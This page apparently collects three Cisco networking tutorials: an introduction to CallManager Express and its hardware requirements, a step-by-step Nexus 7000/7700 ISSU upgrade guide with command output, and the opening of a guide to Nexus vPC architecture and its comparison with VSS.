We have been hearing about VoIP for many years now and while some have never worked with it, it has become today's standard in IP Communications and Private Branch Exchange (PBX) or telephony center solutions.

Popular vendors such as Siemens, Panasonic, Alcatel and many more who, until recently, did not offer VoIP solutions saw the new wave coming and produced solutions that would allow their systems to support VoIP. However, these 'hybrid' products are not pure VoIP and do not support expected VoIP PBX features such as SIP Trunking with global providers, codec selections, H.323 call signalling protocol and more.

While Cisco never produced analogue or digital PBXs (thank goodness!) they started off right with the latest technology, which is VoIP. Carrying decades of experience with the largest portion of the switching and routing market, Cisco Call Manager and Call Manager Express were born.

Cisco CallManager, now officially named 'Cisco Unified Communication Manager' or CUCM, is a server-based IP Telephony solution and currently Cisco's flagship VoIP product. Scalable to support thousands of IP Phones by clustering multiple CUCM servers together, it is the ultimate pure VoIP solution for enterprise customers.

Recognising the need to penetrate smaller markets, Cisco came out with a smaller version, Cisco CallManager Express, also known as CCME or CME. The new official name here is Cisco Unified Communication Manager Express (CUCME); however, most people still call it by its older name, CCME.

Cisco CallManager Express (CME) is a fully capable IP Telephony solution able to handle from 24 phones up to 450 phones depending on the router model. Perhaps the best part of CME is that it runs on Cisco routers and does not require separate hardware, as is the case for CUCM.

Assuming you have a Cisco router, running CME can be as simple as upgrading your IOS and possibly DRAM memory. From there on, depending on your requirements, you can configure and use it immediately or you might require an additional upgrade. CallManager Express is extremely flexible because it is modular.

Downloading CallManager Express and Identifying Different Versions

CME is a software-based IP Telephony system embedded in the more advanced Cisco IOS feature sets. The Cisco IOS packages are as follows, and the highlighted ones provide CME functionality:

  1. IP Base
  2. IP Voice
  3. Enterprise Base
  4. Advanced Security
  5. SP Services
  6. Advanced IP Services
  7. Enterprise Services
  8. Advanced Enterprise Services

All four highlighted editions contain a full version of CME capable of covering most companies' VoIP requirements.

The above IOS packages apply to all IOS releases up to 12.4. From IOS 15.0 onwards, Cisco has introduced the concept of a 'Universal IOS' that includes all services (1 to 8) but activates them with the appropriate license! With IOS 15 and above, you must have a UC (Unified Communications) license activated in order to use and configure Cisco CallManager Express or voice services.

Cisco CME GUI files are available for download at our Cisco CallManager Express (CCME) GUI Administration Files download page.

CME versioning is also quite simple to follow. Depending on the IOS version, your CME version will also change. The latest available version at the time of writing this article is version 14.1, which is present in IOS XE version 17.11.

Cisco's Unified CME, Unified SRST, and Cisco IOS Software Version Compatibility Matrix is available for download in our Cisco IP Phone & VoIP Devices Firmware - Software download section.

Cisco CME Hardware Requirements

CME's requirements depend on the product version and platform on which it will be installed.

For example, the latest v8.1 requirements for a Cisco 2811 router are 256MB DRAM and at least 128MB Flash memory. This will provide support for up to 35 IP Phones. A Cisco 2851 router will support up to 100 IP Phones, however, it will require 384MB DRAM accompanied by at least 128MB Flash memory.

Obviously the Cisco 2851 router is a much larger model and is able to support more IP Phones, hence the increased requirements in DRAM.

With the new 2900 ISR series routers the requirements are pretty much the same for all models. For example, a Cisco 2901 router will support up to 35 IP Phones and requires 512MB DRAM with 256MB Flash memory. The Cisco 2951 will support up to 150 IP Phones and requires exactly the same amount of DRAM and Flash memory (512/256).

The reason for this is that Cisco has recently changed its IOS strategy and now provides a 'Universal' IOS that has all features built in (e.g. firewalling, VoIP, VPN etc); however, it requires an activation code in order to enable the different services and functions. This might sound like a great idea, but many Cisco engineers do not agree with Cisco's tactic, as it seriously limits the IOS features you are able to 'test' on your routers.

Generally, if you would like to try out Cisco CallManager Express, then version 7.1 (IOS version 12.4(24)T) is a great starting point as it contains numerous bug fixes and enhancements. This version is also able to run on older Cisco 1760 series routers and is not tied to the licensing restrictions Cisco has introduced with IOS version 15 and above.

If you would like to learn more about CallManager Express, you can visit our Cisco CallManager Express Basic Concepts - Part 1 article.

Summary

This article introduced the Cisco CallManager Express system and covered the hardware it runs on. Articles that follow in the voice section deal with the analysis of CallManager Express and the UC500 series IP PBXs (including UC520, UC540 & UC560), covering everything from simple configuration to complex setups for demanding customers.

 

Nexus 7000/7700 Software Upgrade via ISSU

Nexus 7000/7700 Software Upgrade via ISSU. Complete Upgrade Guide, Configuration Check, Verifying ISSU Capability

This article shows how to perform an ISSU (In-Service Software Upgrade) on a Nexus Data Center switch (7000 and 7700 models) and avoid service and network disruption. We explain the importance of keeping your NX-OS software updated, how the upgrade process is executed, explain the purpose of the Kickstart and System images, provide methods on how to transfer the NX-OS images to the switch bootflash on both supervisor engines, verify ISSU capability and test/simulate the upgrade process.

In addition we cover useful commands to discover issues that might occur during the upgrade process, configuration backup methods, upgrading a Nexus 7000 and Nexus 7700 series with single or dual Supervisor Engines (SUP1 and SUP2 models).

Why Upgrade Your Nexus 7000/7700 NX-OS Software

Upgrading your NX-OS can be a daunting task as there is always the risk something might go wrong. Despite this, it is very important to ensure your core Nexus switch is running one of the latest and supported images.

If you’re looking for reasons to take the risk and upgrade, here are a few that might help convince you:

  • Old NX-OS images might be stable but usually contain a number of bugs and security vulnerabilities that can put your core network and organization at risk.
  • Your NX-OS version might not be supported any more. This means that in the event of a failure or problem, Cisco Technical Assistance Center (TAC) might require you to upgrade to a supported NX-OS version before providing any support.
  • Support of new features, services and technologies. By upgrading to a newer NX-OS you’ll be able to take advantage of newer features that will now be supported.
  • Support of new Modules and Supervisor Engines. When considering upgrading your Nexus Supervisor Engines or adding new modules it’s likely an upgrade will be required to support them.
  • Peace of Mind. Knowing you’re on a supported, tested and patched up version always helps sleeping better at night!

It’s always recommended to perform thorough research on the NX-OS version under consideration to identify caveats or issues that might affect your production environment. This information can be found on Cisco’s website or by opening a Cisco TAC Service Request.

What is an ISSU Upgrade?

The ISSU upgrade process provides us with the ability to upgrade a Nexus 7000/7700 switch without network or service disruption. During the ISSU process all Nexus modules and Supervisor Engines are fully upgraded without requiring a switch reboot.

A prerequisite for the ISSU upgrade is to have dual Supervisor Engines and an ISSU-supported release already loaded on your Nexus switch. The dual Supervisor Engines are necessary as the ISSU process upgrades one Supervisor Engine at a time to keep the system up and running.

Cisco publishes a list of ISSU supported releases for every new NX-OS release. This means engineers should check the release notes of the candidate release they wish to upgrade to and see if their current version is amongst the ISSU supported releases.

Finally, an ISSU upgrade might be disruptive if there are configured features that are not supported on the new software image. We’ll show how you can test the ISSU upgrade process before initiating it.

How The ISSU Upgrade Works

Below is the process an ISSU upgrade follows on a Nexus 7000 with dual supervisor engines:

  1. Installation begins with the install all command.
  2. The installation process will verify the location and integrity of the new software image files.
  3. System verifies the operational status and the current software version of both supervisor engines and all switching modules to ensure that the system is capable of an ISSU.
  4. System initially upgrades all module cards bios/loader/bootrom.
  5. System loads the new software images to the standby supervisor engine and brings it up to the HA ready state.
  6. A supervisor switchover is then forced.
  7. The new software image is loaded on the formerly active (now standby) supervisor and brings it up to the HA ready state.
  8. A non-disruptive upgrade is performed on each of the switching modules starting from module 1.
  9. Finally, on a Nexus 7000 with SUP-1 supervisor engines, each Connectivity Management Processor (CMP) is upgraded one at a time.

During the ISSU upgrade the switch provides continuous update of its progress and no command input is possible until the upgrade has been completed.

The ISSU upgrade can be initiated via an SSH or Telnet session to the Nexus switch or directly from the active supervisor engine console port.

When a supervisor switchover occurs, it’s possible the SSH/Telnet session will be lost but you can re-connect immediately and continue to monitor the upgrade process by issuing the show install all status command. Alternatively connect to both supervisor engine console ports simultaneously.

Understanding Nexus Kickstart and System Images

The Nexus 7000 requires two images in order to run: the first is a Kickstart image, while the second is a System image.

Here’s what they look like:

NEXUS_7000# dir bootflash://sup-1/
392990621 Sep 08 11:14:54 2018 n7000-s1-dk9.6.2.20a.bin
 31178240 Sep 08 11:01:10 2018 n7000-s1-kickstart.6.2.20a.bin

The Kickstart image is around 31Mb-70Mb in size depending on the NX-OS version and contains the Linux kernel, basic drivers and initial file system. The System image is much larger, around 400Mb-650Mb in size depending on the NX-OS version and contains the system software and infrastructure code.
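
Before transferring new images, it can be useful to confirm which kickstart and system images the switch is currently configured to boot, and which version is actually running. On NX-OS this can be checked with the following commands (output omitted here):

NEXUS_7000# show boot
NEXUS_7000# show version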

Transferring Images to Nexus 7000/7700 Switch

FTP is the recommended method of transfer. Thanks to the TCP transport protocol utilized by the FTP protocol, it is highly unlikely the image integrity will be compromised during the transfer.

Following are the possible locations where the image files can be stored on the Nexus:

  • bootflash: or  bootflash://sup-1/   (essentially the same location on supervisor engine 1)
  • bootflash://sup-2/ This is the supervisor engine 2 bootflash

Image transfer can be initiated using the ftp command as shown in the example below:

NEXUS_7000# copy ftp://192.168.1.1/n7000-s1-kickstart.6.2.20a.bin bootflash:
Enter vrf (If no input, current vrf 'default' is considered):
Enter username: cisco
Password:
[################# ] 29.55MB ***** Transfer of file Completed Successfully *****
Copy complete, now saving to disk (please wait)...

At this point we can transfer the image to the supervisor engine 2 bootflash using the command:

NEXUS_7000# copy ftp://192.168.1.1/n7000-s1-kickstart.6.2.20a.bin bootflash://sup-2/

or copy the image directly from supervisor engine 1 with the following command:

NEXUS_7000# copy bootflash://sup-1/n7000-s1-kickstart.6.2.20a.bin bootflash://sup-2/

The second method is faster and preferred.
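
Whichever method is used, it is worth confirming that both the kickstart and system image files are present on the standby supervisor's bootflash before proceeding, for example:

NEXUS_7000# dir bootflash://sup-2/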

Configuration Backup

Creating a configuration backup should be mandatory in any upgrade process. This can be achieved via a simple show running-config, copy-pasting the output to a text file, or by using the Nexus checkpoint feature.
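
A minimal sketch of both approaches is shown below (the checkpoint and file names are arbitrary examples); a checkpoint created this way can later be restored with the rollback running-config checkpoint command if required:

NEXUS_7000# checkpoint pre_upgrade
NEXUS_7000# copy running-config bootflash:pre_upgrade_backup.cfg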

Incompatible Configuration Check, Verifying ISSU Capability, Testing The Upgrade Process

Verifying the upgrade and ISSU process is an extremely important step and should never be skipped. Cisco’s release notes clearly state the supported ISSU paths; however, executing the test commands shown in this section will reveal any incompatible configuration and provide complete insight into what will happen during the upgrade.

Here are the two commands highly recommended to be executed before the upgrade. Both are non-disruptive:

  • show incompatibility system bootflash:<image> . Performs a configuration compatibility check that will highlight any configuration or features that might impact the upgrade process.
  • show install all impact kickstart bootflash:<image> system bootflash:<image> . Performs a simulated upgrade that verifies the new firmware integrity, ISSU upgrade process, provides detailed report of which module images will be upgraded and more.

Below is the output of each command. In this particular environment we are checking an upgrade from NX-OS  6.2(16) to 6.2(20a):

NEXUS_7000# show incompatibility system bootflash:n7000-s1-dk9.6.2.20a.bin
Checking incompatible configuration(s)
No incompatible configurations
Checking dynamic incompatibilities:
-----------------------------------
No incompatible configurations

The system has reported there are no issues with our configuration. Next, we execute a test/simulation of the upgrade process:

The show install all impact command will take a long time to complete as it simulates the upgrade process.

PH_NEXUS_7000# show install all impact kickstart bootflash:n7000-s1-kickstart.6.2.20a.bin system bootflash:n7000-s1-dk9.6.2.20a.bin

Installer will perform impact only check. Please wait.

Verifying image bootflash:/n7000-s1-kickstart.6.2.20a.bin for boot variable "kickstart".

[####################] 100% -- SUCCESS

Verifying image bootflash:/n7000-s1-dk9.6.2.20a.bin for boot variable "system".

[####################] 100% -- SUCCESS

Performing module support checks.

[####################] 100% -- SUCCESS

Verifying image type.

[####################] 100% -- SUCCESS

Extracting "lc1n7k" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "bios" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "system" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "kickstart" version from image bootflash:/n7000-s1-kickstart.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "cmp" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "cmp-bios" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Notifying services about system upgrade.

[####################] 100% -- SUCCESS

Compatibility check is done:

Module      bootable           Impact           Install-type      Reason

------       --------      --------------      ------------       ------

     1         yes         non-disruptive       rolling 

     2         yes         non-disruptive       rolling 

     3         yes         non-disruptive       rolling 

     4         yes         non-disruptive       rolling 

     5         yes         non-disruptive         reset 

     6         yes         non-disruptive         reset 

     7         yes         non-disruptive       rolling 

     8         yes         non-disruptive       rolling 

     9         yes         non-disruptive       rolling 

    10        yes          non-disruptive       rolling 

<output omitted>

The key column here is the Impact column. This confirms that our upgrade to the new image will be non-disruptive for every module, including the supervisor engines (Modules 5 & 6). The supervisor engines will be reset (one at a time), but an automatic switchover between them ensures there is no service disruption.

Performing the Nexus ISSU Upgrade

Once we are confident and ready, we can proceed with the upgrade using the install all command. Keep in mind that if you’re connected via SSH, you’ll be disconnected from the session as soon as the active supervisor engine is rebooted.

To reconnect and continue monitoring the installation process, SSH back in and issue the show install all status command. Alternatively, you can stay connected to the console ports of both supervisor engines.
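For example, once reconnected, the per-module progress can be checked at any time (output omitted here):

NEXUS_7000# show install all status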

Once the initial checks are complete, you’ll be prompted to confirm with a "y" (yes) to continue with the installation:

NEXUS_7000# install all kickstart bootflash:n7000-s1-kickstart.6.2.20a.bin system bootflash:n7000-s1-dk9.6.2.20a.bin

Installer will perform compatibility check first. Please wait.

Verifying image bootflash:/n7000-s1-kickstart.6.2.20a.bin for boot variable "kickstart".

[####################] 100% -- SUCCESS

Verifying image bootflash:/n7000-s1-dk9.6.2.20a.bin for boot variable "system".

[####################] 100% -- SUCCESS

Performing module support checks.

[####################] 100% -- SUCCESS

Verifying image type.

[####################] 100% -- SUCCESS

Extracting "lc1n7k" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "bios" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "system" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "kickstart" version from image bootflash:/n7000-s1-kickstart.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "cmp" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "cmp-bios" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS


Notifying services about system upgrade.

[####################] 100% -- SUCCESS

Compatibility check is done:

Module      bootable         Impact         Install-type    Reason

------       --------      --------------    ------------   ------

     1         yes        non-disruptive       rolling 

     2         yes        non-disruptive       rolling 

     3         yes        non-disruptive       rolling 

     4         yes        non-disruptive       rolling 

     5         yes        non-disruptive         reset 

     6         yes        non-disruptive         reset 

     7         yes        non-disruptive       rolling 

     8         yes        non-disruptive       rolling 

     9         yes        non-disruptive       rolling 

    10        yes         non-disruptive       rolling 

Images will be upgraded according to following table:

Module       Image                  Running-Version(pri:alt)           New-Version  Upg-Required

------  ----------  ----------------------------------------  --------------------  ------------

     1      lc1n7k                                   6.2(16)              6.2(20a)           yes

     1        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

     2      lc1n7k                                   6.2(16)              6.2(20a)           yes

     2        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

     3      lc1n7k                                   6.2(16)              6.2(20a)           yes

     3        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

     4      lc1n7k                                   6.2(16)              6.2(20a)           yes

     4        bios     v1.10.11(11/24/09):v1.10.11(11/24/09)    v1.10.21(11/26/12)           yes

     5      system                                   6.2(16)              6.2(20a)           yes

     5   kickstart                                   6.2(16)              6.2(20a)           yes

     5        bios     v3.22.0(02/20/10):  v3.22.0(02/20/10)     v3.22.0(02/20/10)            no

     5         cmp                                   6.2(16)              6.2(20a)           yes

     5    cmp-bios                                  02.01.05              02.01.05            no

     6      system                                   6.2(16)              6.2(20a)           yes

     6   kickstart                                   6.2(16)              6.2(20a)           yes

     6        bios     v3.22.0(02/20/10):  v3.22.0(02/20/10)     v3.22.0(02/20/10)            no

     6         cmp                                   6.2(16)              6.2(20a)           yes

     6    cmp-bios                                  02.01.05              02.01.05            no

     7      lc1n7k                                   6.2(16)              6.2(20a)           yes

     7        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

     8      lc1n7k                                   6.2(16)              6.2(20a)           yes

     8        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

     9      lc1n7k                                   6.2(16)              6.2(20a)           yes

     9        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

    10      lc1n7k                                   6.2(16)              6.2(20a)           yes

    10        bios     v1.10.11(11/24/09):v1.10.11(11/24/09)    v1.10.21(11/26/12)           yes

Do you want to continue with the installation (y/n)?  [n] y

Install is in progress, please wait.

Performing runtime checks.

[####################] 100% -- SUCCESS

Syncing image bootflash:/n7000-s1-kickstart.6.2.20a.bin to standby.

[####################] 100% -- SUCCESS

Syncing image bootflash:/n7000-s1-dk9.6.2.20a.bin to standby.

[####################] 100% -- SUCCESS

Setting boot variables.

[####################] 100% -- SUCCESS

Performing configuration copy.

[####################] 100% -- SUCCESS

Module 1:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 2:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 3:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 4:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 5:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 6:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 7:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 8:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 9:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 10:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS


Module 6: Waiting for module online.

 -- SUCCESS

Notifying services about the switchover.

[####################] 100% -- SUCCESS

Module 6: <Sat Sep  8 12:59:40>

 Waiting for module online.

 -- SUCCESS

Module 1: <Sat Sep  8 13:08:54>

 Non-disruptive upgrading.

 -- SUCCESS

Module 2: <Sat Sep  8 13:10:48>

 Non-disruptive upgrading.

 -- SUCCESS

Module 3: <Sat Sep  8 13:12:43>

 Non-disruptive upgrading.

 -- SUCCESS

Module 4: <Sat Sep  8 13:14:38>

 Non-disruptive upgrading.

 -- SUCCESS

Module 7: <Sat Sep  8 13:16:36>

 Non-disruptive upgrading.

 -- SUCCESS

Module 8: <Sat Sep  8 13:18:34>

 Non-disruptive upgrading.

 -- SUCCESS

Module 9: <Sat Sep  8 13:20:30>

 Non-disruptive upgrading.

 -- SUCCESS

Module 10: <Sat Sep  8 13:22:29>

 Non-disruptive upgrading.

 -- SUCCESS

Module 6: <Sat Sep  8 13:24:25>

 Upgrading CMP image.

Warning: please do not reload or power cycle CMP module at this time.

 -- SUCCESS

Module 5: <Sat Sep  8 13:29:26>

 Upgrading CMP image.

Warning: please do not reload or power cycle CMP module at this time.

 -- SUCCESS

<Sat Sep  8 13:35:17>

 Recommended action::

"Please reload CMP(s) manually to have it run in the newer version.".

Install has been successful.
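Acting on the recommended action above, the CMP of each supervisor engine can then be reloaded manually during a convenient window. On Supervisor 1 engines this is typically done with the reload cmp module command; the syntax below is a sketch for our supervisors in slots 5 and 6 and should be confirmed against the documentation for your release:

NEXUS_7000# reload cmp module 5
NEXUS_7000# reload cmp module 6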

Nexus Upgrade Verification – Supervisor Engines and Modules

Once the installation is complete, a simple show version will verify the Nexus switch operating system has been upgraded:

NEXUS_7000# show version
Cisco Nexus Operating System (NX-OS) Software
TAC support: http://www.cisco.com/tac
Documents: http://www.cisco.com/en/US/products/ps9372/tsd_products_support_series_home.html
Copyright (c) 2002-2018, Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained in this software are
owned by other third parties and used and distributed under
license. Certain components of this software are licensed under
the GNU General Public License (GPL) version 2.0 or the GNU
Lesser General Public License (LGPL) Version 2.1. A copy of each
such license is available at
http://www.opensource.org/licenses/gpl-2.0.php and
http://www.opensource.org/licenses/lgpl-2.1.php
Software
  BIOS:      version 3.22.0
  kickstart: version 6.2(20a)
  system:    version 6.2(20a)
  BIOS compile time:       02/20/10
  kickstart image file is: bootflash:///n7000-s1-kickstart.6.2.20a.bin
  kickstart compile time:  8/10/2018 12:00:00 [07/16/2018 16:23:37]
  system image file is:    bootflash:///n7000-s1-dk9.6.2.20a.bin
  system compile time:     8/10/2018 12:00:00 [07/16/2018 17:36:43]
<output omitted>

In addition, the show module command provides detailed information on the installed modules and their software version, which should now match the newly installed release:

NEXUS_7000# show module

Mod  Ports  Module-Type                         Model              Status

---  -----  ----------------------------------- ------------------ ----------

1    48     10/100/1000 Mbps Ethernet XL Module N7K-M148GT-11L     ok

2    48     10/100/1000 Mbps Ethernet XL Module N7K-M148GT-11L     ok

3    48     10/100/1000 Mbps Ethernet XL Module N7K-M148GT-11L     ok

4    48     1000 Mbps Optical Ethernet XL Modul N7K-M148GS-11L     ok

5    0      Supervisor Module-1X                N7K-SUP1           active *

6    0      Supervisor Module-1X                N7K-SUP1           ha-standby

7    32     10 Gbps Ethernet XL Module          N7K-M132XP-12L     ok

8    48     10/100/1000 Mbps Ethernet XL Module N7K-M148GT-11L     ok

9    32     10 Gbps Ethernet XL Module          N7K-M132XP-12L     ok

10   48     1000 Mbps Optical Ethernet XL Modul N7K-M148GS-11L     ok

Mod  Sw              Hw

---  --------------  ------

1    6.2(20a)        1.0    

2    6.2(20a)        1.0    

3    6.2(20a)        1.0    

4    6.2(20a)        1.1    

5    6.2(20a)        2.0    

6    6.2(20a)        2.0    

7    6.2(20a)        1.3    

8    6.2(20a)        1.0    

9    6.2(20a)        1.5    

10   6.2(20a)        1.5 

Finally, you can view the installation log using the show install all status command.

Summary

This article explained the importance of upgrading your Cisco Nexus 7000/7700 NX-OS operating system, what an ISSU (In-Service Software Upgrade) is, how ISSU works and the steps involved during the process.  We also talked about the purpose and role of the Nexus Kickstart image and Nexus System image and showed how to transfer an image to your Nexus 7000/7700 switch.

In addition, we touched on different methods to back up your Nexus configuration, perform the important configuration compatibility check, verify ISSU capability and test the upgrade process. Finally, we saw how the Nexus ISSU upgrade is performed, along with the upgrade verification process covering the supervisor engines and installed modules.

The Complete Cisco Nexus vPC Guide

The Complete Cisco Nexus vPC Guide. Features & Advantages, Design Guidelines, Configuration, Failure Scenarios, Troubleshooting, VSS vs vPC

Cisco virtual Port Channel (vPC) is a virtualization technology, launched in 2009, which allows links that are physically connected to two different Cisco Nexus Series devices to appear as a single port channel to a third endpoint. The endpoint can be a switch, server, router or any other device, such as a firewall or load balancer, that supports link aggregation (EtherChannel).

To correctly design and configure vPC one must have sound knowledge of the vPC architecture components (vPC Domain, vPC Peer, vPC Peer-Link, vPC Peer Keepalive Link, vPC Member Port, vPC Orphan Port etc) but also follow the recommended design guidelines for the vPC Peer Keepalive Link and vPC Peer-Link. Furthermore, understanding vPC failure scenarios such as vPC Peer-Link failure, vPC Peer Keepalive Link failure, vPC Peer Switch failure, vPC Dual Active or Split Brain failure will help plan ahead to minimise network service disruption in the event of a link or device failure.

All the above including verifying & troubleshooting vPC operation are covered extensively in this article making it the most comprehensive and complete Cisco Nexus vPC guide.

The diagram below clearly illustrates the differences in both logical and physical topology between a non-vPC deployment and a vPC deployment:

vPC Deployment Concept

The Cisco Nexus vPC technology has been widely deployed; according to figures presented at Cisco Live Berlin 2016, it is used in almost 95% of Cisco data centers. Virtual Port Channel was introduced in NX-OS version 4.1(4) and is included in the base NX-OS software license. The technology is supported on the Nexus 9000, 7000, 5000 and 3000 Series.

Let's take a look at the vPC topics covered:

We must point out that basic knowledge of the Cisco NX-OS is recommended for this article. You can also refer to our Introduction to Nexus Family – Nexus OS vs Catalyst IOS for an introduction study on the Nexus Series switches family. Finally, a Quiz is included at the last section and we are waiting for your comments and answers!


vPC Feature Overview & Guidelines

The Nexus 9000, 7000, 5000 and 3000 series switches take port-channel functionality to the next level by enabling links connected to different devices to aggregate into a single, logical link. The peer switches run a control protocol that synchronizes and maintains the state of the port channel. In particular, vPC belongs to the Multichassis EtherChannel (MEC) family of technologies and provides the following main technical benefits:

  • Eliminates Spanning Tree Protocol (STP) blocked ports
  • Uses all available uplink bandwidth
  • Allows dual-homed servers (dual uplinks) to operate in active-active mode
  • Provides fast convergence upon link or device failure
  • Offers dual active/active default gateways for servers
  • Maintains independent control planes
  • Simplifies Network Design

The following general guidelines and recommendations should be taken into account when deploying vPC technology at a Cisco Nexus Data Center:

  • The same type of Cisco Nexus switch must be used for vPC pairing. It is not possible to configure vPC on a pair consisting of a Nexus 7000 series and a Nexus 5000 series switch, nor between a Nexus 5000 and a Nexus 5500 switch.
  • The vPC peers must run the same NX-OS version, except during a non-disruptive upgrade, that is, an In-Service Software Upgrade (ISSU).
  • The vPC Peer-Link must consist of at least two 10G Ethernet ports in dedicated mode. Utilizing Ethernet ports from two different modules improves availability and redundancy should a module fail. Using 40G or 100G interfaces increases the bandwidth of the vPC Peer-Link.
  • The vPC keepalive link must be separate from the vPC Peer-Link.
  • vPC can be configured in multiple VDCs, but the configuration is entirely independent. In particular, each VDC on the Nexus 7000 Series requires its own vPC peer and keepalive links, which cannot be shared among VDCs.
  • The maximum number of switches in a vPC domain is two.
  • The maximum number of vPC peers per switch or VDC is one.
  • Static routing from a device to the vPC peer switches, with the FHRP virtual IP as the next hop, is supported.
  • Dynamic routing adjacency from the vPC peer switches to any Layer 3 device connected on a vPC is not supported. It is recommended that routing adjacencies be established on separate routed links.
  • vPC member ports must terminate on the same line card type at each end, e.g. M2 cards on both peers.

vPC Architecture Components – vPC Peer, Peer-Link, Keepalive Link, Domain, Member Port, Orphan Port & Member

vPC architecture consists of the following components:

vPC Peer

This is the adjacent device, which is connected via the vPC Peer-Link. A vPC setup consists of two Nexus devices in a pair: one acts as the Primary and the other as the Secondary, which allows other devices to connect to the two chassis using Multichassis EtherChannel (MEC).


vPC Architecture Components

vPC Peer-link

The vPC peer-link is the most important connectivity element in the vPC setup. This link is used to synchronize the state between vPC peer devices via vPC control packets which creates the illusion of a single control plane. In addition the vPC peer-link provides the necessary transport for multicast, broadcast, unknown unicast traffic and for the traffic of orphaned ports. Finally, in the case of a vPC device that is also a Layer 3 switch, the peer-link carries Hot Standby Router Protocol (HSRP) packets.

vPC Peer Keepalive Link

The Peer Keepalive Link provides a Layer 3 communications path that is used as a secondary test in order to determine whether the remote peer is operating properly. In particular, it helps the vPC switch to determine whether the peer link itself has failed or whether the vPC peer is down.  No data or synchronization traffic is sent over the vPC Peer Keepalive Link—only IP/UDP packets on port 3200 to indicate that the originating switch is operating and running vPC. The default timers are an interval of 1 second with a timeout of 5 seconds.
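If the defaults need tuning, the interval and timeout can be specified as part of the peer-keepalive command. A minimal sketch, using the keepalive VRF and addressing configured later in this article (the values shown are simply the defaults):

N5k-Primary(config)# vpc domain 1
N5k-Primary(config-vpc-domain)# peer-keepalive destination 192.168.1.2 source 192.168.1.1 vrf keepalive interval 1000 timeout 5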

vPC Domain

This is the common domain configured across the two vPC peer devices, and its value identifies the vPC. Only one vPC domain ID is permitted per device (or per VDC).

vPC Member Port

This is the interface that is a member of one of the vPCs configured on the vPC peers.

Cisco Fabric Services (CFS)

This protocol is used for stateful synchronization and configuration.  It utilizes the peer link and does not require any configuration by the administrators. The Cisco Fabric Services over Ethernet protocol is used to perform compatibility checks in order to validate the compatibility of vPC member ports to form the channel, to synchronize the IGMP snooping status, to monitor the status of the vPC member ports, and to synchronize the Address Resolution Protocol (ARP) table.

Orphan Device

This is a device that is on a vPC VLAN but connected to only one vPC peer, not to both.

Orphan Port

An orphan port is an interface on a vPC VLAN that connects to an orphan device.

non-vPC VLAN

Any of the STP VLANs not carried over the peer-link.
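Orphan devices and their ports can be listed directly on each vPC peer; a quick reference check (output omitted) is:

N5k-Primary# show vpc orphan-ports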

Virtual Port Channel (vPC - Nexus) vs Virtual Switching System (VSS - Catalyst)

Virtual Switching System (VSS) is a virtualization technology that pools multiple Cisco Catalyst Switches into one virtual switch, increasing operational efficiency, boosting nonstop communications, and scaling system bandwidth capacity. VSS was first available in the Cisco 6500 series and was later introduced to the Cisco 4500,  the newer 4500X, 6800 Series switches and the Catalyst 3850 (April 2017 onwards).

The vPC feature is currently not supported by any Cisco Catalyst Series Switches and is available only on the Nexus switches family.

While VSS makes use of Multichassis EtherChannel (MEC) to bond Cisco Catalyst Series switches together, vPC is used on Cisco Nexus Series switches for the same purpose. Both technologies look similar from the perspective of the downstream switch, but there are differences, mainly in how the control plane operates on the upstream devices. The next table summarizes the main characteristics and features of the VSS and vPC technologies:

Feature                              VSS                     vPC
-----------------------------------  ----------------------  ----------------------------
Multi-Chassis Port Channel           Yes                     Yes
Loop Free Topology                   Yes                     Yes
Spanning Tree as failsafe protocol   Yes                     Yes
Maximum physical nodes               2                       2
Non-disruptive ISSU support          No                      Yes
Control Plane                        Single logical node     Two independent active nodes
Layer 3 port channel                 Yes                     Limited
Configuration                        Common configuration    Two different configurations
EtherChannel                         Static, PAgP, LACP      Static, LACP

Table 1. Comparing Catalyst VSS with Nexus vPC

